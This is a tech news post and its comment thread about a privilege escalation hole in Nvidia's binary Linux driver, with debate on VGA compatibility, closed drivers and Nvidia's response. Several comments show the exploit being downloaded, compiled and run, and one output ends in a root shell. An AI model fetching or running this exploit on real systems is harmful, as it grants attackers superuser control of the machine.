Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole 180
An anonymous reader writes "The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to nvidia months ago and it was never fixed. Now the exploit was made public."
The one releasing the exploit (relayed to him anonymously) is David Arlie, well known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.
Use Windows | +5 Insightful (Score:5, Funny)
Re:Use Windows | +5 Insightful (Score:5, Funny)
Re: (Score:2)
Especially if you're referring to a Pinto.
Re:Use Windows | +5 Insightful (Score:5, Insightful)
Use Windows and you don't get linux malware. True story, mod +5 true accordingly.
Since Nvidia's drivers share a large amount of common code, I'd say it's only a matter of time.
Re: (Score:2)
Don't feed the trolls.
h### account name promoting Microsoft. I'm shocked!
A view to a kill. (Score:2, Interesting)
Shouldn't the VGA window be a window into the video memory, or at least configuration registers?
Re:A view to a kill. (Score:5, Informative)
VGA maps the video card's memory [osdever.net] into the regular CPU address space so that applications can read and write directly to it. That's the VGA window being referenced here. Removing that is further complicated by waiting to retain compatibility with older video standards (CGA, EGA).
Re:A view to a kill. (Score:4, Insightful)
Re: (Score:3)
Re: (Score:2)
That used to be true, but I don't think I have owned a computer that didn't boot in VGA in almost 6 years. My latest laptop boots directly into some kind of SVGA and runs the bios in that. I had a screen that couldn't show lowres SVGA for some reason, and it became a bit of problem since the screen was blank until X loaded. I had to change grub to switch to text-mode, atleast that worked, but old text modes are not used by default anymore, not even by Debian.
Re: (Score:2)
Every SVGA implementation I'm aware of still maps the display buffer into main memory and then has low-level software twiddle the bits manually. Any laptop that doesn't do that I would say isn't even a "PC Compatible" anymore. If it has a BIOS, it almost certainly has memory-mapped I/O into the "VGA window" alluded to here. There might be some UEFI systems that have broken this part. But a company like NVIDIA surely has to still deal with at least bootstrapping BIOS-based system in their driver.
Re:A view to a kill. (Score:4, Insightful)
Guess what, your computers boots right into 16-color text mode (used by the BIOS and sometimes by Windows as part of the boot sequence) using EGA colors. Not sure if that's relevant but it might be. Linux might also use something similar for its boot process and for Ctrl+Alt+Fn terminals.
Yes. When it does that, the OS has not yet loaded. Hell, the boot loader (GRUB in my case) has not yet loaded.
It's obviously implemented in hardware. That means it has nothing to do with the nVidia driver that my OS loads up and whether that nVidia driver supports EGA.
So okay, I'll rephrase my previous comment from "nobody uses it" to "no one needs the nVidia driver to provide it".
Re: (Score:2)
Re: (Score:2, Insightful)
Is this due to a very old code base in the windows driver, and the driver code being shared between both linux and windows? Compatibility makes sense if you are running DOS or allowing DOS apps to function (or maybe 16-bit windows). But I very much doubt Monochrome, CGA, EGA, and some of the old VGA standard works at all in modern windows, and definitely not in linux.
This should never have been exposed to the user in linux and hopefully not in windows either. And if compatibility is a concern, then it shoul
Re: (Score:3, Informative)
Windows 7 still includes a VGA video driver.
Re: (Score:2)
That it does. Reimaged a dell e6240 laptop using IBM's tavoli system manager the other week, and it apparently failed at some point. Everything installed and worked except the one video driver.
These laptops can use the built in intel video for battery savings and switch over to a build in nvidia "card" when more grunt is needed. The issue was the laptop wouldn't output video to an external monitor. I checked in device manager and the nvidia card was listed as it should be, but the intel video was listed as
Re: (Score:2)
Users wanting monochrome/CGA/EGA could just use nouveau, the only reason to use the nvidia binary blob is to support 2D/3D acceleration.
Nope (Score:3)
TwinView doesn't work in nouveau
Re: (Score:2)
TwinView is the name of nvidia's implementation of multimonitor support.
If you need multiple monitores, nouveau supports this [freedesktop.org].
Anyway, my point was that users needing monochrome/EGA/CGA have no need for nvidia's binary blob.
Re: (Score:3)
Re:A view to a kill. (Score:4, Insightful)
VGA works fine in Windows and in Linux. See Linux framebuffer [wikipedia.org] as a relatively modern implementation. (I say relatively modern because I'd been using Linux for a long time before it was added, and it's new compared to things like X-Windows) PC hardware is certainly not so abstracted away by useful APIs that the drivers can ignore this level of detail, to be protected from them. Manipulating this sort of thing is exactly what a driver is written to do.
Your suggestion that this shouldn't have been exposed to the user is missing the point: this is an exploit. The driver itself needs to know all these details to properly initialize itself and support old-school text/VGA modes during boot. The user was likely never intended to have access to them, but an exploit isn't limited to what the user is supposed to do. Whether or not the path is protected or not is irrelevant if the path is bypassed.
Re: (Score:2)
VESA is a standard for settings modes [monstersoft.com] and the like. Under that hood there is still the same old memory mapped I/O as always.
Re:A view to a kill. (Score:4, Interesting)
So how does Windows deal with restricting where this window can be remapped?
Re: (Score:2)
Re: (Score:2)
It sounds like either the Nvidia driver there does not have this bug, or it does have the bug but nobody has discovered it yet.
Re: (Score:2)
But do we really need this backwards compatibility? Look at the supported video cards; does anyone that uses those cards need compatibility with that? The driver also required a relatively recent kernel; so again, is this compatibility required?
I'm not trying to be ironic, I'm legitimately in doubt here.
Re: (Score:2)
If you want to be able to switch from the video mode the system boots in, which is certainly some sort of memory-mapped VGA-era thing, into the fancier modes, the driver needs to worry about this. The fact that it doesn't likely do very much at all with the VGA memory before moving into something else is probably why the code is buggy; presumably it's not like they ever review this part of it anymore.
Re: (Score:2)
Older video standards have been banned ever since KMS depended on FBCON in the kernel.
Re: (Score:3)
Does the Nvidia driver even support KMS?
Re: (Score:2)
There is no need whatsoever to remove that. There IS a need for the driver to not allow mmaping any other arbitrary memory range into a userspace app andto properly control access to the video memory.
Hoooo boy... (Score:5, Interesting)
With all the recent controversy and Linus and other members of the FOSS community flipping Nvidia the bird over the issue of keeping their driver closed, they're certainly going to take this news and run with it.
Re:Hoooo boy... (Score:5, Insightful)
Correct. That's why i choose AMD.
Not that they're that much better, but at least they tried to.
Re: (Score:2, Insightful)
Nvidia's future is going to be determined almost entirely on success or failure of the Tegra line, which will predominantly run Android. That's why Linus flipped them the bird. Nvidia, as a company, is becoming increasingly dependent upon Linux to succeed financially. Yet they are not making any effort to engage developers or the community at large.
Re: (Score:2)
FLOSS is, at best, a niche market and as such has little influence on business decisions.
One wonders how FLOSS had little influence on the business decision to, well, support FLOSS as part of their business.
Mysteries, mysteries.
Also, Nvidia want go sell GPUs for HPC. Not supporting Linux is simply not an option in that market.
Re: (Score:2)
. 90+% of Nvidia's customers don't use FOSS at all.
That may be true, for all I know or care but it's not for want of trying. As their traditional desktop market is dissapearing into irrelevance, with Apple having already decided to skip Nvidia [wikipedia.org] they are desperate to get into the Android market [fiercecio.com] and without that they are in deep trouble.
There is a real reason why their PR people were out in force in response to Linuses recent commends and if I were investing, the fact that they failed to get traction with the community would mean I would be moving my money
Open Source Advantage (Score:5, Insightful)
I'd like to say that this would not have happened with an open source driver, but that's not necessarily true. It would almost definitely have been patched by now though.
Re: (Score:2)
It could have happened, and most probably would have happened at some point, but might have been spotted sooner, and would have been fixed long ago now.
Plus, I'm sure there's plenty of other bugs/exploits we still haven't even discovered.
It might have been patched already... (Score:2)
I'd like to say that this would not have happened with an open source driver, but that's not necessarily true. It would almost definitely have been patched by now though.
Sure, it's be patched, and you could probably apply the patch locally, but it wouldn't be in the official repository yet. And then you get to wait for the review process, where someone tells you how they would have done it differently, if they only had the time or the interest, but since you didn't do it that way, you need to rewrite your patch. This is pretty much true of most Open Source communities, which tend not to take rough consensus and working code, and then clean up the cosmetic stuff later.
Then
Re: (Score:2)
In most Open Source communities, this whole thing can take months.
Go ahead and look up a bug report for any recent vulnerability in a major linux distribution and you'll see this isn't true. Most critical security bugs get pushed to stable within a few days, perhaps a week, of being publically announced.
Now, it is true that often they sit on private disclosure bugs until a CVE or public exploit is made available. That's poor resource allocatio, IMO, but fixes for wild exploits simply aren't something that
Re: (Score:2)
It wouldn't have happened with an open source driver because Linus wouldn't have allowed such a foolish feature into the kernel. The open source drivers have quite complicated - and unfortunately somewhat performance-sapping - in-kernel checks on any interaction with the GPUs in order to stop attackers from doing exactly this kind of thing.
Re:Open Source Advantage (Score:5, Funny)
Re: (Score:2)
You have to get to it first. Good luck with that.
Re: (Score:2)
Talk is cheap. You still haven't said how you are going to get to my box to use this.
THAT is the subtle difference between a bug and something that manages to cripple the entire Internet.
Bad? Sure. Dire? Not so much.
For limited values of "you" (Score:4, Funny)
It needs a local execution method (either another exploit or a tricked user) and access to /dev/nvidia0.
So, for example, even if you exploit a web service to execute this on a suitable machine, you still won't get anything as long as web service's user doesn't have permissions on /dev/nvidia0.
Worst of all, it still needs downloading and compiling sources. WTF, Linux? When are we going to get all the software available prepackaged and regularly updated from the repository? Other OSes handle it well, no need for "wget && patch && gcc" to get this working, no need for sudo and sometimes even no need for any actions from user AT ALL, simply visit a page and it just works!
Re:For limited values of "you" (Score:5, Insightful)
When are we going to get all the software available prepackaged and regularly updated from the repository?
That's a fairly half-hearted troll. Most Linux distros have package management and multi-source software repositories that make iOS, Metro, and OS X look like the limited attempts at platform lock-in that they really are.
Re: (Score:3)
Well, the presence of a local escalation hole makes other vulnerabilities more serious... Just some of the possible scenarios:
An HPC cluster with multiple non root users, could exploit this to get root...
Someone using linux as a workstation, exploited via a userland hole (eg browser bug), this nullifies the advantage of running as an unprivileged user.
Sure it's not as serious as a remote root hole, but it can still be a useful hole for a hacker.
Re: (Score:2)
Re: (Score:2)
So you're going to foot the legal bills for auditing all the source for copyrights and patents, plus pay for all the costs associated with rewriting any and all licensed code that won't allowed to be open sourced, and finally finance all the extra work needed to make it into mainline? You realize it's not as simple for NVIDIA as creating a public git repo and uploading the source code, right?
Re: (Score:2)
Re: (Score:2)
I use VMWare almost every single day on a Linux host that employs the Nouveau drivers, and it works fine. KDE 4 desktop on the host, a bit of eye candy.
If you're trying to use the Nouveau (or even the proprietary) drivers *inside* a VMware guest, that's just silly, and I really hope that's not what you meant.
Re: (Score:2)
Crap. s/VMware/VirtualBox/
(I do NOT use VMware. There being little point in doing so when VBox is free as in beer AND in speech and just plain works better.)
Nvidia rotten to the core (Score:2, Insightful)
Nvidia are just serial fuckups. Wasted half my saturday trying to find a driver release that would work on my wifes Kubuntu 11 PC. Eventually gave in and upgraded to 12.04 instead of manually erasing the broken install yet again... to find another fscking broken driver and no X. These idiots are completely incompetent and simply don't respond to error reports or much of anything else from ordinary users.
Nvidia, still haven't forgotten all the accelerated functions in your chipsets that gradually got turned
Re: (Score:2)
Frankly a root exploit is one of their lesser sins.
Then their cardinal sins must be Hitlerian; (from David Arlie's write-up)
It basically abuses the fact that the /dev/nvidia0 device accept
changes to the VGA window and moves the window around until it can
read/write to somewhere useful in physical RAM, then it just does an
priv escalation by writing directly to kernel memory.
It doesn't take a lot of thought to understand the implications of the hole. And smacks of pure lazyness on the part of nVidia.
Re:Nvidia rotten to the core (Score:5, Informative)
Frankly a root exploit is one of their lesser sins.
Then their cardinal sins must be Hitlerian; (from David Arlie's write-up)
You forget the episodes like their broken hardware accelerated NIC, that dropped random bits.
First the spent months claiming there was no bug.
Then they spent months claiming they'd fixed it (they hadn't).
Then they claimed they'd fixed it when they'd actually just disabled the acceleration and fallen back to software!
Over a year of data loss for anyone that believed them.
Same thing happened with their attempt at accelerated sound hardware. And pretty much everything else they've tried accelerating apart from GPUs. GPUs have a whole different class of problems to do with not listening to feedback.
Re: (Score:3)
haha, that's a fucking classic.
makes me laugh almost as hard as believing that I'd get video decoding support in gpu when I bought a gf 6800 back in the day(you know, because it said so on the box). "In late 2005, an update to Nvidia's website finally confirmed what had long been suspected by the user community: WMV-acceleration is not available on the AGP 6800. Of course, today's standard computers are fast enough to play WMV9 video and other sophisticated codecs like MPEG-4, H.264 or Theora without hardwa
Re:Nvidia rotten to the core (Score:4, Informative)
I think they might have a culture of not listening. The chief maintainer of nvidia's official forums, posted after Linus outburst a series of post about how Linus complaints had cause "him and his family severe grief", and that Linus should shut up, and would not be welcome on the forum, and that anybody talking about his comments would be banned.
Jesus christ, that guy needs serious help, but it might be an institutional problem. Maybe they are taught that any complaints about Nvidia are actually mortal stains on their honour as employees of Nvidia??
Re:Nvidia rotten to the core (Score:5, Insightful)
Somebody should probably tell Nvidia that a driver that enables arbitrary memory read/write could probably be used as a DRM circumvention mechanism if targeted at a 'protected' program rather than the kernel. That might actually get them to fix it...
Re: (Score:2)
A new ultra-critical patch to the Nvidia drivers has been installed (no, we didn't ask you about it first).
We fixed a serious security problem, and now the system will ensure that access to memory in multimedia and copy-protected applications cannot be circumvented. Such access is limited to less critical data such as credit card and banking data, the password database, and kernel memory in general (for areas that do not handle media pathways).
Re: (Score:2)
Unlikely in their Linux driver and I'm not sure how the 'Protected Media Path' is doing in Win7; but in Vista's PMP implementation [microsoft.com] a driver bug of this flavor(especially in the GPU, since that needs to enforce OPM restrictions) could theoretically lead to cryptographic revocation of the driver...
"If a trusted component in the PE becomes compromised, after due process it will be revoked. However, Microsoft provides a renewal mechanism to install a newer trusted version of the component when one becomes avail
Re: (Score:2)
I recommend booting from a LiveCD before installing so you can see if the drivers work.
Re: (Score:2)
In your particular case, the issue is Ubuntu, that does not ship the driver properly, or have any simple way of installing it, and not Nvidia. You'd better use a distro that actually supports it, or use hardware(and driver) your distro completely supports.
Re: (Score:2)
Who the FUCK modded you Insightful?
Sonovabitch why to the retards ALWAYS come out the one day I don't have mod points?
Re: (Score:3, Insightful)
Seriously? This is the kind of shit that makes people hate us Linux users. "Oh, you had a problem? Should have used $MY_FAVORITE_DISTRO then it would have worked! (Unless it still didn't, but let's just ignore that possibility so I can be a smug bastard.)"
Re: (Score:3)
His advice makes sense.
You bought hardware from a company unwilling to document it's hardware and unwilling to release it's drivers, installed a distro that opts for FLOSS drivers, and then compained the combination didn't work. Of course it didn't, you can't just have ANY software run with ANY hardware perfectly as you expect it to.
Re: (Score:2)
Ubuntu goals are to support and promote free software, NOT to provide support for every fancy 3D feature; there's no reason for them to support nvidia's driver if there's a free alternative.
If you want to use that driver, you'd be better of finding an OS that matches your philosophy.
distro wars or idiot vs adept. (Score:2)
If people keep insisting on abusing their watered down idiot's distro, then crying when it doesn't work. We're going to keep telling them to use the right tool for the job!
Re: (Score:2)
Is it really too much to ask that a basic piece of hardware is supported at a basic level, by a mainstream distro?
I'm not even talking about 3D acceleration or complex setups. The guy was trying to configure a basic desktop.
Why should something like screen resolution and basic display functionality still require tinkering and a different configuration that is different between distros?
Don't go off on the user and his 'crying when his idiot distro doesn't work'. It's 2012. If distros still can't agree on a s
Re: (Score:3)
Some distros try to simplify things for the user, but get it wrong. Feel free to complain to Canonical. They are the ones trying to beat a new path away from the rest of us. This stuff Just Works on Debian, the closest thing to Ubuntu.
ps - is a PC assembled from parts from 30+ vendors and at least 4 different firmware vendors really "a basic piece of hardware" ?
Re: (Score:2, Insightful)
Oh, please!
I've re-written the installers for NVidia's binary blobs and library mangling several times, and sent the fixes to NVidia. The problem is that the installer moves aside the existing OpenGL libraries and crates symlinks to their *own* proprietary libraries, and doesn't inform the local package management system of the change. So updates break it, and the installer gets very confused if you try to run it with a new installer and haven't cleared the old installer.
Cleaning up after the resulting mess
works here (Score:5, Informative)
It's certainly legit..
c@v:~$ ... ... ./nvid-root
c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin
2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225]
c@v:~$ mv 86747-001.bin nvid-root.c
c@v:~$ gcc nvid-root.c -o nvid-root
c@v:~$
[*] IDT offset at 0xc1808000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 32-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xc18086e0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
[*] Have root, will travel..
sh-4.2#
sh-4.2#
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
sh-4.2#
sh-4.2# lsb_release -a
LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
Distributor ID: Ubuntu
Description: Ubuntu 12.04 LTS
Release: 12.04
Codename: precise
sh-4.2# uname -a
Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
sh-4.2#
Re:works here (Score:5, Informative)
[*] IDT offset at 0xffffffff81b60000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff81b60dc0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned fffffffffffffffe (-2)
[*] Failed to get root.
Re:works here (Score:4, Interesting)
Doesn't work for me on Linux Mint Debian Edition with Xfce, nVidia driver version x86_64-290.10:
uname -a | sed -e 's/^[^0-9]*//'
3.2.0-2-amd64 #1 SMP Sun Mar 4 22:48:17 UTC 2012 x86_64 GNU/Linux
lsb_release -a
LSB Version: core-2.0-amd64:core-2.0-noarch:core-3.0-amd64:core-3.0-noarch:core-3.1-amd64:core-3.1-noarch:core-3.2-amd64:core-3.2-noarch
Distributor ID: LinuxMint
Description: Linux Mint Xfce Edition
Release: 1
Codename: debian
./nvid-root
[*] IDT offset at 0xffffffff8172a000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff8172adc0)
[*] Enhancing gate entry...
[*] Triggering payload...
Killed
Message from syslogd@qcomp at Aug 1 12:30:52 ...
kernel:[148805.500504] Oops: 0000 [#1] SMP
Message from syslogd@qcomp at Aug 1 12:30:52 ...
kernel:[148805.500641] Stack:
Message from syslogd@qcomp at Aug 1 12:30:52 ...
kernel:[148805.500658] Call Trace:
Message from syslogd@qcomp at Aug 1 12:30:52 ...
kernel:[148805.500675] Code: Bad RIP value.
Message from syslogd@qcomp at Aug 1 12:30:52 ...
kernel:[148805.500684] CR2: ffffffff81a00000
Re: (Score:2)
One wonders if its possible to block this with SELinux.
Re: (Score:3, Insightful)
Why not; SELinux certainly has no problem blocking anything useful from working.
Re: (Score:2)
Only if you use it to deny all access to the device. But you can do that with rmmod too.
Re: (Score:2)
Didn't work on either 32 bit gentoo machines of mine. One with an old card that requires nvidia-drivers-96.43.20: ./nvid-root ./nvid-root
[*] IDT offset at 0xc13fe000
[*] Abusing nVidia...
(just ended there)...and one with nvidia-drivers-295.49:
[*] IDT offset at 0xc13d4000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 32-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xc13d46e0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned fffffffb (-5)
[*] Failed to get root.
Re: (Score:2)
Worked on mine with a custom 3.4 kernel (on AMD64) and with Nvidia 304.22. I'm going to upgrade to 3.5 and see if that makes any difference. Unsurprisingly, but annoyingly, it's knackered VGA mode so I can't switch back to the VTs.
good thing (Score:2)
meh (Score:5, Interesting)
Not too long ago Intel had a firmware exploit in their processors.
I still appreciate the effort Nvidia's made to support their cards on OSes such as linux and BSD over the years. I'll still only EVER buy nvidia cards because of their driver support.
Here's hoping they keep trucking along at it, even with what Linus' said and now this.
Re: (Score:2)
I bought one Nvidia card because of their wonderful Linux support. I'll never buy another.
Re: (Score:2)
Even if you've never bought a discrete card, you've used one, integrated either onto the motherboard, into the northbridge, or on the processor itself.
One of my earliest computers had an ATI Rage 3D right on the motherboard. Later, I used one with an nVidia chipset, which had (I believe) a 7000-series GPU integrated with the northbridge. My current laptop has an Intel GPU right on the processor (it also has a discrete nVidia card). Unless your computer literally does not have any video capability, it has so
Re: (Score:2)
Re: (Score:2)
And most importantly, you've used drivers for that graphics processor. Which could be exploited like this one.
Re: (Score:2)
Re: (Score:2)
Okay, Intel makes drivers. What they don't make is video cards that work worth a damn.
He meant to say, "of the video cards that can play games with decent frame rates, NVidia has the best drivers on Linux."
One of many (Score:5, Insightful)
Only a month notice? (Score:2)
At normal software companies this would probably go through a process like:
1) Confirmation of the problem
2) Determine severity
3) Assign a release to fix it by
4) Have someone fix it
5) Verify the fix
6) Ship it with the next release
In addition, one may want to look around for related problems and fix those too. Since it is a security issue, I would hope that a fix makes it into the next driver release AFTER the one that is in process. O
Re: (Score:2)
The process you describe can be done in a week, it sure doesn't take a month
Nvidia has released on a week's notice in the past.
They never even replied. (Score:3)
Yeah, one month can be pretty short notice to actually fix, test, and release some more complicated bugs. But in this cas,e Nvidia never even responded to people who notified them of the exploit. If I reported a security hole and they acknowledged it and let me know the were working on fixing it, then I would give them far more than a month to fix it. But if they just ignored me, then I'd release it after a month too.
Put the whole driver on the video card! (Score:4, Interesting)
There's plenty of horsepower on the card
Platform-agnostic api, super-duper-thin wrapper libaries
It also solves all the whinging about binary blobs
Should probably post to the support foru- oh, wait (Score:2)
Probably not the best way to follow up their snippy response to Linus Torvald bashing their Linux support.
Re:Who did he send it to at Nvidia? (Score:5, Insightful)
Maybe people need to stop being apologists for this kind of thing...
Companies don't just hand out the email address for the head of their SW development division; maybe if they did we could them let the right people know. I emailed a random Joe when I found an issue with a site, and it got escalated up and it got fixed.
Maybe if Nvidia had better quality random Joe's, when this sort of stuff did pass by them it would get escalated and not deleted.
Re: (Score:3, Informative)
Re:Who did he send it to at Nvidia? (Score:5, Informative)
Yeah you don't get more flimsy evidence than a working exploit.
Re:Who did he send it to at Nvidia? (Score:5, Interesting)
If you're not surprised then I hope it's because you expect Nvidia to be shite. Microsoft, as policy (though possibly not practice), fully evaluates any possible security exploits submitted because they assume that among the cranks who've already broken through the airlock there might be a real security exploit. This is expensive but necessary. If Nvidia can't do the same then I'll have to seriously consider my choices next time I'm buying a card.
Re: (Score:3)
I didn't say Windows was perfect, just that if you send a (crank) security exploit to Microsoft they review it. They may not fix it. They may say the best that you can do is upgrade, but they know whether or not it's a real hole. (At least, that's the policy.)
Re: (Score:3)
Re: (Score:2)
X11 has NEVER been secure its ridiculous to try and point the finger at Nvidia and this is why they have not cared for a month.
I probably knew this at some point. Sounds like a good reason to keep X11 off of your servers, and have X11 only on your workstations. (What would be a reason to have a gui on a unix server..I don't know.)
Re: (Score:2)
(What would be a reason to have a gui on a unix server..I don't know.)
As someone inexperienced in such matters installing a complex network configuration (for me) involving multiple cards, bonded links and a private subnet on one end, the third time I lost network connectivity due to some mistake, I decided it was easiest to install a GUI on the machine and configure it locally.
Re: (Score:2)
Get rid of it. Use Wayland.
I really hope you are joking. Please tell me you do not seriously believe this...